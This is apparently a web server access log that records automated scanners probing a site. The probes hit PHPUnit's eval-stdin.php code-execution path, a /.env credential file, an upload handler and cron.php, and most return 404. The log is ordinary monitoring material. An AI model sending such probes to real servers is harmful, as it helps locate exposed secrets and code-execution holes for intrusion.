66.9.184.129 - - [10/Apr/2025:07:19:58 +0200] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:20:07 +0200] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 398 "-" "Custom-AsyncHttpClient"
66.9.184.129 - - [10/Apr/2025:07:20:17 +0200] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Custom-AsyncHttpClient"
151.106.160.158 - - [10/Apr/2025:07:20:37 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4062227bac5d51bd8702451076779409 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:07:20:37 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4062227bac5d51bd8702451076779409 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:07:20:37 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4062227bac5d51bd8702451076779409 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
66.9.184.129 - - [10/Apr/2025:07:20:41 +0200] "-" 408 - "-" "-"
165.154.217.44 - - [10/Apr/2025:07:21:38 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
165.154.217.44 - - [10/Apr/2025:07:21:38 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
195.20.18.175 - - [10/Apr/2025:07:23:07 +0200] "GET /server/php/index.php?file=tf2rghf.jpg HTTP/1.1" 404 385 "-" "ALittle Client"
195.20.18.175 - - [10/Apr/2025:07:23:08 +0200] "GET /server/php/index.php?file=tf2rghf.jpg HTTP/1.1" 404 372 "-" "ALittle Client"
151.106.165.0 - - [10/Apr/2025:07:23:57 +0200] "GET /cron.php?cron_type=tidy_cache&sid=1e779cee6cf9cf187d970db569329c0b HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.0 - - [10/Apr/2025:07:23:57 +0200] "GET /cron.php?cron_type=tidy_cache&sid=1e779cee6cf9cf187d970db569329c0b HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.0 - - [10/Apr/2025:07:23:58 +0200] "GET /cron.php?cron_type=tidy_cache&sid=1e779cee6cf9cf187d970db569329c0b HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [10/Apr/2025:07:24:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.173.252 - - [10/Apr/2025:07:24:46 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2219b294bdf3f7167bc9768b51ad7116 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.173.252 - - [10/Apr/2025:07:24:46 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2219b294bdf3f7167bc9768b51ad7116 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.173.252 - - [10/Apr/2025:07:24:46 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2219b294bdf3f7167bc9768b51ad7116 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
